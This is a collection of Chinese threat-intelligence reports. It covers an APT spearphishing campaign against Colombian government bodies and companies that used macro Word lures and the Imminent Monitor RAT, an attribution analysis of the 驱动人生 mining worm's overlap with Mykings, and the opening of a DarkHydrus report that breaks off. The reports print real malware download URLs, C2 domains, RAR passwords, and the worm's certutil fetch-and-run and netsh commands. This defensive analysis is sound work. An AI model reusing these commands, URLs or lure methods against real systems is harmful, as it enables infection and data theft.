Chevron 雪佛龙,美国一家跨国能源公司。
Energizer Holdings Inc. 美国电池制造商
Progressive Corporation 美国最大汽车保险提供商
Simon Property Group Inc 美国商业地产公司
Sports Authority Inc 美国的一家体育用品零售商
Strongeagle, Lda. 葡萄牙一家与公司法,税务债务和法院诉讼相关公司

部分受影响目标

360威胁情报中心在近一年内针对该APT攻击进行监控和关联后发现了其多个用于攻击哥伦比亚政府、金融机构及大型企业的相关邮件。基于对鱼叉邮件的分析,我们列举了如下针对性的诱饵文档以及对应的受害政企。

1. 哥伦比亚国家石油公司

1)被攻击机构信息及相关邮件

哥伦比亚国家石油公司(www.ecopetrol.com.co)主要经营范围包括石油、天然气勘探开发,管线建设以及石油炼制。

攻击哥伦比亚国家石油公司的相关邮件

攻击哥伦比亚国家石油公司的相关邮件

2)相关诱饵文档

攻击者伪装成哥伦比亚国家税务和海关总署进行攻击活动:

Dian Embargo Bancario # 609776.doc

Dian Embargo Bancario # 609776.doc

2. 哥伦比亚石油公司(Hocol)

1)被攻击机构信息及相关邮件

Hocol成立于1956年,是哥伦比亚国家石油公司Ecopetrol的子公司,专注于哥伦比亚国内各地的勘探和生产活动。

攻击哥伦比亚石油公司Hocol的相关邮件

攻击哥伦比亚石油公司Hocol的相关邮件

2)相关诱饵文档

攻击者伪装成哥伦比亚国家税务和海关总署进行攻击活动:

estado de cuenta.doc

estado de cuenta.doc

3. 哥伦比亚物流公司(Almaviva)

1)被攻击机构信息及相关邮件

Almaviva是一家物流运营商,通过流程和工具的安全管理优化供应链,确保物流运营的效率。

攻击物流公司Almaviva的相关邮件

攻击物流公司Almaviva的相关邮件

2)相关诱饵文档

攻击者伪装成哥伦比亚国家统计局进行攻击活动:

listado de funcionarios autorizados para censo nacional 2018.doc

listado de funcionarios autorizados para censo nacional 2018.doc

4. 哥伦比亚国家金融机构(BancoAgrario)

1)被攻击机构信息及相关邮件

哥伦比亚国家金融机构(BancoAgrario)主要致力于向农村地区提供金融服务。

image.png

攻击BancoAgrario的相关邮件

2)相关诱饵文档

攻击者伪装成哥伦比亚国家网络警察局(caivirtual.policia.gov.co)进行攻击活动

Reporte fraude desde su dirrecion ip.doc

Reporte fraude desde su dirrecion ip.doc

5. 哥伦比亚车轮制造商(IMSA)

1)被攻击机构信息及相关邮件

IMSA是专业的车轮制造商,致力于使用优质原材料进行车轮制造。

攻击IMSA的相关邮件

攻击IMSA的相关邮件

2)相关诱饵文档

攻击者伪装成哥伦比亚国家税务和海关总署(www.dian.gov.co)进行攻击活动

Dian Embargo Bancario # 609776.doc

Dian Embargo Bancario # 609776.doc

6. 哥伦比亚银行(Banco de Occidente)

1) 被攻击机构信息

Banco de Occidente是哥伦比亚最大的银行之一,是哥伦比亚Grupo Aval金融服务集团的一部分。

攻击Banco de Occidente的相关邮件

攻击Banco de Occidente的相关邮件

2) 相关诱饵文档

攻击者伪装成哥伦比亚国家司法部门(www.fiscalia.gov.co)进行攻击活动

Citacion Fiscalia general de la Nacion Proceso 305351T.doc

Citacion Fiscalia general de la Nacion Proceso 305351T.doc

7. ATH哥伦比亚分部

1) 被攻击机构信息

ATH是一个跨国银行金融机构,在哥伦比亚开设有分部。

攻击ATH哥伦比亚分部相关邮件

攻击ATH哥伦比亚分部相关邮件

2) 相关诱饵文档

攻击者伪装成哥伦比亚国家司法部门(www.fiscalia.gov.co)进行攻击活动

Fiscalia proceso 305351T.doc

Fiscalia proceso 305351T.doc

8. Sun Chemical哥伦比亚分部

1) 被攻击机构信息

Sun Chemical是印刷油墨,涂料等用品的跨国企业,同样在哥伦比亚开设有分公司。

攻击Sun Chemical哥伦比亚分公司的邮件

攻击Sun Chemical哥伦比亚分公司的邮件

2) 相关诱饵文档

攻击者伪装成哥伦比亚移民权力机构(www.migracioncolombia.gov.co)进行攻击活动

Proceso Pendiente Migracion Colombia.doc

Proceso Pendiente Migracion Colombia.doc

9. 哥伦比亚Byington公司

1) 被攻击机构信息

Byington对哥伦比亚主要的商业公司进行评级和财务评估。

攻击哥伦比亚Byington公司的相关邮件

攻击哥伦比亚Byington公司的相关邮件

2) 相关诱饵文档

攻击者伪装成哥伦比亚国家税务和海关总署(www.dian.gov.co)进行攻击活动

estado de cuenta.doc

estado de cuenta.doc

三、技术细节

360威胁情报中心基于该APT组织常见的攻击手法对整个攻击过程进行了详细分析。

1. 最新的一次攻击

2019年2月14日,360威胁情报中心再次监控到该APT组织的最新攻击活动,根据最近捕获到的诱饵文档(MD5:0c97d7f6a1835a3fe64c1c625ea109ed)并没有找到对应的邮件,不过在进行关联调查后,我们发现了另外一个类似的诱饵文档(MD5:3de286896c8eb68a21a6dcf7dae8ec97)及其对应的有针对性攻击邮件(MD5:f2d5cb747110b43558140c700dbf0e5e)。该邮件伪装来自哥伦比亚国家民事登记处,对哥伦比亚国家盲人研究所进行攻击。

攻击哥伦比亚国家盲人研究所的邮件

最近捕获的诱饵文档,伪装来自哥伦比亚国家民事登记处(MD5:0c97d7f6a1835a3fe64c1c625ea109ed)

攻击哥伦比亚国家盲人研究所的邮件

攻击哥伦比亚国家盲人研究所的邮件

2. 伪造来源及躲避查杀

攻击者在攻击不同目标时,仔细考虑了如何伪装邮件的来源从而使其看起来更加可信。比如通过伪装民事登记处来攻击盲人研究所,伪装成税务和海关总署来攻击那些有国际贸易的企业,伪装成司法部门和移民权力机构来针对银行和跨国公司哥伦比亚分部等。

攻击者同样对邮件内容进行精心构造,使其看似源自被伪造的机构,且与被攻击者日常工作生活相关。下图为伪装成哥伦比亚国家司法部门对ATH哥伦比亚分部的攻击中对应邮件的内容翻译:

邮件正文附带RAR密码

邮件附件被加密存放在压缩包内,并在邮件正文中提供解密密码,用于绕过邮件网关的安全检测。

邮件正文附带RAR密码

邮件正文附带RAR密码

对邮件进行分析后,我们发现攻击者在发送邮件时都使用了VPN等方式来隐藏自身,因此尚未能获得发件者的真实IP,只是发现这些邮件通过位于美国佛罗里达州的IDC机房发出,部分相关的IP地址为:

128.90.106.22

128.90.107.21

128.90.107.189

128.90.107.236

128.90.108.126

128.90.114.5

128.90.115.28

128.90.115.179

3. 诱饵文档

此次攻击活动诱饵文档均采用MHTML格式的Word文档进行攻击,MHTML格式的Word文档能在一定程度上避免杀毒软件的查杀。例如360威胁情报中心在2019年2月中旬捕获的样本:Registraduria Nacional – Notificacion cancelacion cedula de ciudadania.doc

文件名 Registraduria Nacional – Notificacion cancelacion cedula de ciudadania.doc
MD5 0c97d7f6a1835a3fe64c1c625ea109ed
伪装来源 哥伦比亚国家民事登记处

MHTML格式的Word文档

MHTML格式的Word文档

伪装文档

文档伪装成哥伦比亚国家民事登记处,并利用西班牙语提示受害者开启宏代码,从而执行后续Payload

当受害者打开该MIME文档并启用宏功能后,将自动调用Document_Open函数:

调用Document_Open函数

Document_Open首先调用Main函数下载hxxp://diangovcomuiscia.com/media/a.jpg并保存为%AppData%\1.exe(md5: ef9f19525e7862fb71175c0bbfe74247):

调用Document_Open函数

接着调用fcL4qOb4函数,设置伪装成Google的计划任务,相关计划任务的信息如下:

作者 Google Inc
描述(翻译后) 在用户登录系统时检查并上传有关Google解决方案的使用和错误的信息
任务内容 启动%AppData%\1.exe
任务定义 GoogleUpdate

相关代码如下图所示:

调用Document_Open函数

4. Payload(Imminent)

文件名 1.exe
MD5 ef9f19525e7862fb71175c0bbfe74247
编译信息 .NET

释放执行的1.exe为最终的木马后门,该样本为混淆比较严重的C#代码:

image.png

去混淆后可以明确看到Imminent Monitor字符串,该样本为Imminent Monitor RAT:

image.png

样本运行后首先从资源文件中提取名称为“application”的数据,并解密出一个来自7zip合法的lzma.dll库:

690

690

image.png

随后从资源文件中提取名称为“_7z的”数据,并利用lzma.dll解压缩该段数据,得到真正的Imminent Monitor RAT样本(MD5: 4fd291e3319eb3433d91ee24cc39102e):

image.pngimage.png

核心功能分析

1)静态分析

该样本包含Imminent Monitor RAT实体功能代码,但采用了ConfuserEx+Eazfuscator.NET双重淆器加密了代码,如下图所示:

image.png

部分去混淆后可以看出其提供的功能如下表:

ID 功能
bDfBqxDCINCfwSAfMnZwspLefnc 主机管理
ChatPacket 用户支持
cokLfFnjBwgKtzdTpdXSgQIPacR 注册表管理
CommandPromptPacket 远程命令行
ConnectionSocketPacket 网络传输通道管理
ExecutePacket 上传、下载、执行PE文件
FastTransferPacket 支持快速传输
FilePacket 文件管理
FileThumbnailGallery 支持文件缩略图库
KeyLoggerPacket 键盘记录
MalwareRemovalPacket 恶意功能管理
MessageBoxPacket 聊天消息
MicrophonePacket 麦克风聊天
MouseActionPacket 鼠标动作
MouseButtonPacket 鼠标左、右、掠过等
NetworkStatPacket 主机网络管理
PacketHeader 通信数据头信息
PasswordRecoveryPacket 浏览器密码恢复
PluginPacket 插件管理
ProcessPacket 进程管理
ProxyPacket 代理管理(反向代理等)
RDPPacket 提供远程桌面功能
RegistryPacket 注册表操作
RemoteDesktopPacket 标志远程桌面数据包
ScriptPacket 执行脚本(html、vbs、batch)
SpecialFolderPacket Windows特殊文件夹
StartupPacket 启动项操作
TcpConnectionPacket TCP刷新及关闭
ThumbnailPacket 缩略图相关
TransferHeader 通信连接操作
WebcamPacket 网络摄像头相关
WindowPacket Windows操作(刷新、最大化、最小化等)

image.png

通过分析与其官方网站提供的功能说明一致:

image.png2)动态调试

核心模块运行后会检测是否在%temp%\[appname]目录下,如果不在则将自身拷贝为%temp%\[appname]\[appname],并设置文件属性为隐藏:

image.png

然后启动%temp%\[appname]:

image.png

最后删除原始文件,并退出进程

image.png

样本重新启动后将在%AppData%目录创建Imminent目录,该目录将保存加密后的日志、网络信息、系统信息等文件,当接受到相应指令时发送到服务端:

image.png

C&C地址为:mentes.publicvm.com:4050

image.png

四、TTP(战术、技术、过程)

360威胁情报中心总结了该APT组织的TTP如下:

攻击目标 哥伦比亚的政府机构、大型企业以及跨国企业的哥伦比亚分支部门
最早活动时间 2018年4月
主要风险 主机被远程控制,机密信息被窃取
攻击入口 鱼叉邮件
初始载荷 MHTML文件格式含恶意宏代码的Word文档
恶意代码 Imminent后门
通信控制 基于动态域名的远程控制
抗检测能力
受影响应用 Windows系统主机
主要攻击战术技术特征分析 1. 通过入侵西班牙语网站或者注册有隐私保护的域名并上传用于投放的攻击载荷文件和文档;
2. 发送带有MHTML文件格式并包含恶意宏代码的Word文档的鱼叉邮件,并会使用RAR加密诱饵文档以避免邮件网关的查杀;
3. 攻击者伪装成哥伦比亚国家民事登记处、哥伦比亚国家税务和海关总署、哥伦比亚国家统计局、哥伦比亚国家网络警察局、哥伦比亚国家司法部门,对哥伦比亚的政府、金融机构,本国大型企业或跨国公司的哥伦比亚分公司进行攻击;
4. 使用了商业木马Imminent对目标进行远程控制,并采用了基于动态域名的远程控制技术;

五、溯源和关联

360威胁情报中心通过分析攻击者投递的多个加密的Office Word文档的最后修改时间、MHTML文档字符集(语言环境)等信息,并结合地缘政治等APT攻击的相关要素,怀疑攻击者来自于UTC时区在西4区(UTC-4)正负1小时对应的地理位置区域。

1. 可靠的文件修改时间

以投递的加密RAR压缩包(Registraduria Nacional del Estado Civil -Proceso inicado.rar)为例,由于RAR会保存文件的修改时间,所以解密RAR包后得到的Word文档的修改时间非常可靠。右边为解密得到的Word文档修改时间,这和左边诱饵文档(MHTML)元信息内包含的文档修改时间一致(由于笔者处于UTC+8时区,需要将文件修改时间减8小时对比):

image.png

通过对比所有加密RAR文件内的诱饵文档修改时间和文档元信息内的文档修改时间,我们有很大的把握确认文档元信息内的修改时间为攻击者的真实修改时间,这样我们可以以捕获到的所有诱饵文档元信息内的修改时间做数据统计。

2. MHTML诱饵文档修改时间统计

我们统计了所有诱饵文档的修改时间如下表:

UTC+00
00:32
01:15
01:15
01:17
01:35
01:59
02:57
03:28
04:40
04:55
05:17
12:27
12:49
12:50
13:38
13:42
13:49
14:21
14:22
15:19
15:26
15:30
15:56
17:22
17:58
18:31
20:53
21:31
23:30

从大量样本的修改时间可以看出,从未出现过修改时间在05:30到12:30之间的诱饵文档。基于最合理的推测:正常的休息时间应该在晚12点到早8点之间的区域(睡觉时间段),那么攻击者所处的时区应该在西4区(UTC-4)正负1小时的区间内。

3. PE时间戳与诱饵文档修改时间对比

我们还统计了木马程序去混淆后dump出来的核心PE文件时间戳信息,与每个对应的诱饵文档修改时间进行对比可以看出:诱饵文档的修改时间与对应的PE文件的时间戳间隔都非常接近,这更加说明了该攻击活动的定向属性:

诱饵文档修改时间 木马核心模块时间戳
2019/2/11 17:58 2019/2/14 3:28
2018/12/3 15:30 2018/12/3 23:26
2018/11/26 18:31 2018/10/17 22:29
2018/11/15 12:49 2018/10/17 22:29
2018/11/8 14:21 2018/10/17 22:29
2018/10/26 13:49 2018/10/17 22:29
2018/10/22 17:22 2018/10/17 22:29
2018/10/12 15:56 2018/10/17 22:29
2018/10/4 5:17
2018/9/13 13:42 2018/8/27 22:08
2018/9/9 0:32
2018/9/2 20:53 2018/8/27 22:08
2018/8/27 15:19 2018/8/27 22:08
2018/8/6 1:35 2018/8/1 11:25
2018/8/1 2:57 2018/8/1 11:25
2018/7/31 1:59 2018/8/1 11:25
2018/7/30 1:17 2018/8/1 11:25
2018/7/26 3:28 2018/8/27 22:08
2018/7/10 4:55 2018/7/11 11:47
2018/6/19 21:31
2018/6/14 1:15
2018/6/14 1:15
2018/5/29 13:38
2018/5/18 14:22 2018/5/22 20:11
2018/4/28 12:27 2018/5/22 20:11
2018/4/25 23:30 2018/5/22 20:11
2018/4/24 12:50
2018/4/17 15:26 2018/5/22 20:11
2018/4/6 4:40

4. 语言和charset

另外,我们统计了所有的诱饵文档(MHTML),可以看到所有诱饵文档都基于西欧语言环境(西班牙语等)编写:

Charset:windows-1252

Charset:windows-1252

而部分诱饵文档的作者信息也是西班牙文:

Centro de Servicios Judiciales

Centro de Servicios Judiciales

5. 攻击者画像

基于攻击者所处时区、使用的语言以及APT攻击的地缘政治因素我们总结了以下观点:

1. 攻击者所处时区的地理范围刚好处于南美洲

2. 南美洲大部分国家都使用西班牙语(除巴西),这和攻击者的语言环境及Office用户名吻合

3. APT攻击大部分基于地缘政治因素(本国或邻国)

4. 从受害者的背景以及本次攻击行动的持续时间来看,攻击者所关注的政企机构在战略层面有重大意义,且持续时间较长。

综上所述,360威胁情报中心认为攻击者有较大可能是来源于南美洲国家的具有国家背景的APT组织。

IOC

诱饵文档MD5 文件名
0c97d7f6a1835a3fe64c1c625ea109ed Registraduria Nacional – Notificacion cancelacion cedula de ciudadania.doc
16d3f85f03c72337338875a437f017b4 estado de cuenta.doc
27a9ca89aaa7cef1ccb12ddefa7350af 455be8a4210b84f0e93dd96f7a0eec4ef9816d47c11e28cf7104647330a03f6d.bin
3a255e93b193ce654a5b1c05178f7e3b estado de cuenta.doc
3be90f2bb307ce1f57d5285dee6b15bc Reporte Datacredito.doc
3de286896c8eb68a21a6dcf7dae8ec97 egistraduria Nacional del Estado Civil -Proceso inicado.doc
46665f9b602201f86eef6b39df618c4a Orden de comparendo N\xc2\xb0 5098.doc
476657db56e3199d9b56b580ea13ddc0 Reporte Negativo como codeudor.doc
4bbfc852774dd0a13ebe6541413160bb listado de funcionarios autorizados para censo nacional 2018.doc
51591a026b0962572605da4f8ecc7b1f Orden de comparendo multa detallada.doc
66f332ee6b6e6c63f4f94eed6fb32805 Codigo Tarjeta Exito Regalo.doc
688b7c8278aad4a0cc36b2af7960f32c fotos.doc
7fb75146bf6fba03df81bf933a7eb97d Dian su deuda a la fecha.doc
91cd02997b7a9b0db23f9f6377315333 credito solicitado.doc
9a9167abad9fcab18e02ef411922a7c3 comparendo electronico.doc
a91157a792de47d435df66cccd825b3f C:\Users\kenneth.ubeda\Desktop\Migracion colombia proceso pendiente 509876.doc
b4ab56d5feef2a35071cc70c40e03382 Reporte fraude desde su dirrecion ip.doc
b6691f01e6c270e6ff3bde0ad9d01fff Dian Embargo Prima de Navidad.doc
cbbd2b9a9dc854d9e58a15f350012cb6 IMPORTANTE IMPORTANT.doc
cf906422ad12fed1c64cf0a021e0f764 Migracion colombia Proceso pendiente.doc – copia.nono.txt
e3050e63631ccdf69322dc89bf715667 Citacion Fiscalia general de la Nacion Proceso 305351T.doc
ea5b820b061ff01c8da527033063a905 Fiscalia proceso 305351T.doc
eb2ea99918d39b90534db3986806bf0c Proceso Pendiente Migracion Colombia (2).doc
ecccdbb43f60c629ef034b1f401c7fee Dian Embargo Bancario
ee5531fb614697a70c38a9c8f6891ed6 BoardingPass.doc
fd436dc13e043122236915d7b03782a5 text.doc
bf95e540fd6e155a36b27ad04e7c8369 Migracion colombia Proceso pendiente.mht
ce589e5e6f09b603097f215b0fb3b738 estado de cuenta.mht
b0687578284b1d20b9b45a34aaa4a592 sanción declaracion de renta.doc
木马MD5
0915566735968b4ea5f5dadbf7d585cc
0a4c0d8994ab45e5e6968463333429e8
0e874e8859c3084f7df5fdfdce4cf5e2
1733079217ac6b8f1699b91abfb5d578
19d4a9aee1841e3aee35e115fe81b6ab
1bc52faf563eeda4207272d8c57f27cb
20c57c5efa39d963d3a1470c5b1e0b36
2d52f51831bb09c03ef6d4237df554f3
30ecfee4ae0ae72cf645c716bef840a0
3155a8d95873411cb8930b992c357ec4
3205464645148d393eac89d085b49afe
352c40f10055b5c8c7e1e11a5d3d5034
42f6f0345d197c20aa749db1b65ee55e
4354cb04d0ac36dab76606c326bcb187
43c58adee9cb4ef968bfc14816a4762b
4daacd7f717e567e25afd46cbf0250c0
4e7251029eb4069ba4bf6605ee30a610
50064c54922a98dc1182c481e5af6dd4
519ece9d56d4475f0b1287c0d22ebfc2
53774d4cbd044b26ed09909c7f4d32b3
5be9be1914b4f420728a39fdb060415e
5dee0ff120717a6123f1e9c05b5bdbc2
60daac2b50cb0a8bd86060d1c288cae2
6d1e586fbbb5e1f9fbcc31ff2fbe3c8c
763fe5a0f9f4f90bdc0e563518469566
7a2d4c22005397950bcd4659dd8ec249
7b69e3aaba970c25b40fad29a564a0cf
8518ad447419a4e30b7d19c62953ccaf
8ec736a9a718877b32f113b4c917a97a
940d7a7b6f364fbcb95a3a77eb2f44b4
9b3250409072ce5b4e4bc467f29102d2
9db2ac3c28cb34ae54508fab90a0fde7
a1c29db682177b252d7298fed0c18ebe
a3f0468657e66c72f67b7867b4c03b0f
a7cc22a454d392a89b62d779f5b0c724
aaf04ac5d630081210a8199680dd2d4f
ac1988382e3bcb734b60908efa80d3a5
ad2c940af4c10f43a4bdb6f88a447c85
afb80e29c0883fbff96de4f06d7c3aca
b0ed1d7b16dcc5456b8cf2b5f76707d6
b3be31800a8fe329f7d73171dd9d8fe2
b5887fc368cc6c6f490b4a8a4d8cc469
b9d9083f182d696341a54a4f3a17271f
c654ad00856161108b90c5d0f2afbda1
ccf912e3887cae5195d35437e92280c4
d0cd207ae63850be7d0f5f9bea798fda
df91ac31038dda3824b7258c65009808
e2771285fe692ee131cbc072e1e9c85d
e2f9aabb2e7969efd71694e749093c8b
e3dad905cecdcf49aa503c001c82940d
e4461c579fb394c41b431b1268aadf22
e770a4fbada35417fb5f021353c22d55
e7d8f836ddba549a5e94ad09086be126
e9e4ded00a733fdee91ee142436242f4
edef2170607979246d33753792967dcf
ef9f19525e7862fb71175c0bbfe74247
f1e85e3876ddb88acd07e97c417191f4
f2776ed4189f9c85c66dd78a94c13ca2
f2d81d242785ee17e7af2725562e5eae
f3d22437fae14bcd3918d00f17362aad
f7eb9a41fb41fa7e5b992a75879c71e7
f90fcf64000e8d378eec8a3965cff10a
恶意域名
ceoempresarialsas.com
ceosas.linkpc.net
ceoseguros.com
diangovcomuiscia.com
ismaboli.com
medicosco.publicvm.com
mentes.publicvm.com
恶意URL
http://ceoempresarialsas.com/js/d.jpg
http://ceoseguros.com/css/c.jpg
http://ceoseguros.com/css/d.jpg
http://diangovcomuiscia.com/media/a.jpg
http://dianmuiscaingreso.com/css/w.jpg
http://dianportalcomco.com/bin/w.jpg
http://ismaboli.com/dir/i.jpg
http://ismaboli.com/js/i.jpg
RAR加密压缩包MD5 密码
592C9B2947CA31916167386EDD0A4936 censonacionaldepoblacion2018307421e68dd993c4a8bb9e3d5e6c066946ro
A355597A4DD13B3F882DB243D47D57EE documentoadjuntodian876e68dd993c4a8bb9e3d5e6c066946deudaseptiembre
77FEC4FA8E24D580C4A3E8E58C76A297 procesofiscalia30535120180821e68dd993c4a8bb9e3d5e6c066946se
0E6533DDE4D850BB7254A5F3B152A623 migracioncolombia
F486CDF5EF6A1992E6806B677A59B22A credito
FECB2BB53F4B51715BE5CC95CFB8546F 421e68dd993c4a8bb9e3d5e6c066946r
19487E0CBFDB687538C15E1E45F9B805 centrociberneticoenviosipfraude876e68dd993c4a8bb9e3d5e6c066946octubre
99B258E9E06158CFA17EE235A280773A fiscaliadocumentos421e68dd993c4a8bb9e3d5e6c066946agosto
B6E43837F79015FD0E05C4F4B2F30FA5 20180709registraduria421e68dd993c4a8bb9e3d5e6c066946r

参考链接

[1].https://cloudblogs.microsoft.com/microsoftsecure/2018/05/10/enhancing-office-365-advanced-threat-protection-with-detonation-based-heuristics-and-machine-learning/

[2].http://www.pwncode.club/2018/09/mhtml-macro-documents-targeting.html

*本文作者:360天眼实验室,转载请注明来自FreeBuf.COM

背景

近期360威胁情报中心发现劫持“驱动人生”的挖矿蠕虫再次活跃并做出了预警(详情可以参见《劫持“驱动人生”的挖矿蠕虫再次活跃》一文),在分析团伙的新活动时360威胁情报中心发现了一些涉及到Mykings家族活动的现象,但未能得出确定性的结论,在此分享出来供业界参考,希望能补充更多维度的信息共同研判。

网络基础设施的重叠

​在对“驱动人生”劫持事件下载木马的域名dl.haqo.net进行关联分析时,我们注意到其中一个子域名js.haqo.net,在360威胁情报中心的ALPHA平台中被打上Mykings的标签,该域名解析到IP:81.177.135.35 。

f802f687bea309e42fe5b6f5338a75ce.png

查看81.177.135.35的信息,发现该IP在2018年-2019年的时间段基本上是被Mykings家族所使用,下图可以看到此IP绑定的域名几乎全是Mykings使用的C&C,域名格式为js.xxx.xxx,与Mykings的一些子域名格式一致,并且一直到2019年1月24日Mykings的众多域名依然解析到此IP上。而在2019年1月09日,攻击驱动人生的幕后团伙所使用的域名js.haqo.net也解析到了这个IP。

0c7f7119a22417706483b8c840bed6a5.png

为了进一步发现更多的关联,使用ALPHA平台的威胁关联分析功能,可以清晰地看到haqo.net下面的三个子域名与Mykings的部分域名之间的关系:

image.png

在对两个事件涉及到的C&C域名进行关联分析时,除了观察域名是否解析到相同的IP,还需要确认使用同一个IP的时间段是否一致,如果时间段有重叠,共用基础设施的可能性加大。我们整理了攻击驱动人生的团伙与Mykings使用上面提到的三个IP的时间段,如下表所示,可以发现两者使用同一IP的时间段是有所重叠的,显示出更强的关联度。

域名 IP First_Seen Last_Seen
“驱动人生”挖矿蠕虫 js.haqo.net 81.177.135.35 2018/12/25 2019/1/28
Mykings js.mys2016.info 81.177.135.35 2018/5/29 2019/1/27
Mykings js.mykings.pw 81.177.135.35 2018/5/25 2019/1/22
“驱动人生”挖矿蠕虫 ups.haqo.net 66.117.6.174 2018/12/21 2018/12/21
“驱动人生”挖矿蠕虫 v.haqo.net 66.117.6.174 2019/1/7 2019/1/9
Mykings down.mys2018.xyz 66.117.6.174 2018/12/12 2018/12/12
Mykings down.1226bye.pw 66.117.6.174 2018/12/27 2019/1/22
“驱动人生”挖矿蠕虫 ups.haqo.net 223.25.247.152 2018/12/21 2019/1/28
Mykings www.cyg2016.xyz 223.25.247.152 2018/1/28 2019/1/22
Mykings down.mys2016.info 223.25.247.152 2018/1/26 2018/2/4

我们不仅看到了域名解析到IP的重叠情况,还注意到了两个事件相似的HTTP请求:js.haqo.net在2018-12-25首次解析到IP 81.177.135.35上,接着有样本请求了hxxp://js.haqo.net:280/v.sct;2018-12-26日,Mykings的js.mys2016.info也解析都该IP上,有样本请求了hxxp://js.mys2016.info:280/v.sct。

看起来两个事件的不同域名同一个时间段解析到同一个IP上,并且使用了同一个端口280,连URL的Path都一样: /v.sct 。

image.png

Mykings访问hxxp://js.mys2016.info:280/v.sct这个URL的样本如下: 

image.png

可疑的关联性

基于以上的网络基础设施的重叠和访问请求的相似性,我们是否就可以得到“驱动人生”劫持事件与Mykings背后的团伙是同一个呢?我们的观点是:不一定。

Mykings会配合云端机制发起扫描然后尝试扫描和入侵,因此被捕获的样本量相当多;驱动人生事件的永恒之蓝挖矿蠕虫也会主动进行传播,被捕获的样本量也不少。但是,hxxp://js.haqo.net:280/v.sct这个链接指向文件无法下载,2018-12-25日VT上首次出现这个URL时,甚至连TCP连接都没能建立起来,网络上也并没有留存任何请求了这个URL的样本或者URL的相应数据。

image.png

而VT对于URL的检测是不可靠的(特别是没有获取到相应数据的时候),任何人都可以构造一个完全不存在URL提交检测,这样在搜索对应的域名/IP时,URL或者Downloaded Files将会显示出被构造的URL。

例如随意输入hxxp://js[.]haqo.net:6252/admin.asp,尽管请求没成功什么数据也没有返回,依然有三个引擎产生了告警。而再次搜索js.haqo.net时,关联URL中已然多了一条:hxxp://js[.]haqo.net:6252/admin.asp

image.png

image.png

所以尽管看似“驱动人生”劫持木马的幕后团伙跟Mykings有千丝万缕的关系,但是并没有一个确切的能够提供实锤的证据表明他们是同一个团伙或者两个团伙有交流沟通:尽管一些没有被使用的子域名解析到了Mykings掌握的IP上,而且使用的时间段有所重合;两个团伙已知的恶意代码没有太多的相似之处;VT上js.haqo.net的某个URL构造得与Mykings相关性非常强,但却没有实际返回的数据可以用来确认“驱动人生”劫持木马利用到了Mykings的IP对应的服务器资源。

时间线

目前360对于“驱动人生”劫持木马事件做了一系列的分析,在这里简单总结一下“驱动人生”时间的时间线:

2018年12月14日

驱动人生攻击爆发,内网传播用的永恒之蓝漏洞,下载的payload地址:http://dl.haqo.net/dl.exe

当时的永恒之蓝的攻击模块的BAT内容如下:

cmd.exe /c certutil -urlcache -split -fhttp://dl.haqo.net/ dl.exe c:/install.exe&c:/install.exe&netshfirewall add portopening tcp 65531 DNS&netsh interface portproxy    add v4tov4listenport=65531 connectaddress=1.1.1.1 connectport=53

而从该地址下载的dl.exe(f79cb9d2893b254cc75dfb7f3e454a69)的C2地址为:

image.png

2018年12月16日

各大安全厂商曝光该攻击,攻击逐步停止。

2018年12月27日

永恒之蓝攻击模块攻击成功后在目标机器上运行的bat的内容变更下一阶段的payload地址

http://dl.haqo.net/ dl.exe 改成了http://dl.haqo.net/ dll.exe ;

certutil-urlcache -split -f http://dl.haqo.net/ dll.exe c:\installs.exe

netshinterface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1connectport=53

netshfirewall add portopening tcp 65532 DNS2

c:\windows\temp\cm.exe/c c:\installs.exe

taskkill/F /IM cmd.exe

而该地址下载回来的样本(f9144118127ff29d4a49a30b242ceb55)的C2地址为以下3个,增加了http://img.minicen.ga/i.png,而该域名为免费域名,注册地址为:freenom.com

image.png

2019年1月23日

http://dl.haqo.net/dll.exe的地址的样本变为:

59b18d6146a2aa066f661599c496090d,下图为该样本的传播量:

image.png该样本的C2地址变为下图的3个域名,增加了o.beahh.com:

其中 beahh.com域名是2019年1月16日刚注册的。

image.png

image.png

总结

360威胁情报中心基于自有的大数据和威胁情报平台对入侵驱动人生的幕后团伙进行了关联分析,发现其所用的IP与Mykings事件团伙的部分IP重合,并且使用时间的段重合,甚至连样本所访问的URL格式、端口都一样。但是两个团伙已知的恶意代码没有太多的相似之处,格式高度一致的URL没有实际上的请求和响应数据,由于VT不可靠的URL检测机制,该URL是否实际存在也是个疑问。

基于看到的事实,有两个猜想值得关注:

1.入侵“驱动人生”的幕后黑手与Mykings事件团伙存在联系,甚至可能是同一个团伙。

2.“驱动人生”木马的团伙在有意识地积极栽赃嫁祸给Mykings团伙。我们的观点倾向于后者,360威胁情报中心会持续保持跟踪,基于新发现的事实调整自己的看法,也希望安全业界分享自己的发现。

参考

360对劫持“驱动人生”的挖矿蠕虫分析报告系列详情如下表:

分析文章标题 发布日期 分析团队
《利用“驱动人生”升级程序的恶意程序预警》 2018.12.15 360互联网安全中心
《驱动人生旗下应用分发恶意代码事件分析 - 一个供应链攻击的案例》 2018.12.17 360威胁情报中心
《警报!“永恒之蓝”下载器木马再度更新!》 2018.12.19 360安全卫士
《劫持“驱动人生”的挖矿蠕虫再次活跃》 2019.01.24 360威胁情报中心
《MyKings: 一个大规模多重僵尸网络》 2018.01.24 360网络安全研究院

https://ti.360.net/blog/articles/an-attack-of-supply-chain-by-qudongrensheng/

https://weibo.com/ttarticle/p/show?id=2309404318990783612243

https://mp.weixin.qq.com/s?__biz=MzI2MDc2MDA4OA==&mid=2247486576&idx=1&sn=dc5ff6a05fac06608365823173d17dae&chksm=ea65fb07dd1272113e4890dd284d19e945b4e0ae803f75671ee46cb3fbd42c54fa9170caac86&scene=0&xtrack=1#rd

https://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/

*本文作者:360天眼实验室,转载请注明来自FreeBuf.COM

背景

2019年1月9日,360威胁情报中心捕获到多个专门为阿拉伯语使用者设计的诱饵文档。钓鱼文档为携带恶意宏的OfficeExcel文档,恶意宏代码最终会释放执行一个C#编写的后门程序,该后门程序利用了复杂的DNS隧道技术与C2进行通信并执行指令,且通过GoogleDrive API实现文件的上传下载。

360威胁情报中心经过溯源和关联后确认,这是DarkHydrus APT组织针对中东地区的又一次定向攻击行动。DarkHydrus APT组织是Palo Alto在2018年7月首次公开披露的针对中东地区政府机构进行定向攻击的APT团伙[1]。而在此之前,360威胁情报中心曾发现并公开过该组织使用SettingContent-ms文件任意代码执行漏洞(CVE-2018-8414)进行在野攻击的样本,并进行了详细分析[2]。

时间线

与DarkHydrusAPT组织相关的时间线如下:

image.png

根据社交网络的反馈,对此团伙卡巴斯基内部的跟踪代号为:LazyMeerka。[4] 

样本分析
